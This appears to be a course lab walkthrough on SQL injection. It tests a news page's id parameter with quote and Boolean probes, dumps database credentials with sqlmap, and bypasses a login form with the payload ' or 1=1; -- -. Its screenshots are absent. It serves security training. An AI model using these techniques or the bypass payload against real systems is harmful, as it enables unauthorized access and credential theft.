Lab12 - SQL - Injection
Lab12 - SQL - Injection
Lab12 - SQL - Injection
The goal of this lab is to test the web application in order to find all the vulnerable injection
points. Once you find them, you should be able to dump all the data and successfully log
into the web application.
• Web browser
• SQL map.
By now, you should have found few injection points. Test them with different techniques.
Now that you know there is at least one exploitable SQL Injections in the target Web
Application, exploit it and dump all the data from the database. You should be able to
retrieve some very interesting information that will allow you to log into the web app.
Test the login form against SQL injection and use the correct payload to bypass the
authentication mechanism.
Now that we are able to access it, let us navigate the application in order to find all the
possible injection points.
Right now, we do not know any working credential, so if we login we will get a message
similar to the following:
Here we have a list of news and by clicking on any of the links listed, we can see a very
interesting page:
As you can see in the address bar of our browser, it seems that the application accepts a
parameter (id). This is probably used to retrieve the news from a database.
We just added a single quote in the address bar, and as shown in the screenshot above, we
obtained a mysql error. It is time to get our hands dirty! Let us create few payloads in order
to test if the parameter is vulnerable to SQL Injections.
We want to test it against Boolean conditions, so let us use the following payload:
As we can see from the previous two screenshots, we obtain two different results. When
the condition is true, the application returns the news. With a false condition the page
returns no content. This means that the parameter is vulnerable to SQL Injection!
As we can see, we now have a list of usernames and password to use in order to log into the
web application! Let us try one of these:
Let us run some tests and see if we are able to bypass the login! To do this we will use the
following payload:
' or 1=1; -- -
As we can see the form is vulnerable too, indeed the “Welcome!” message appears!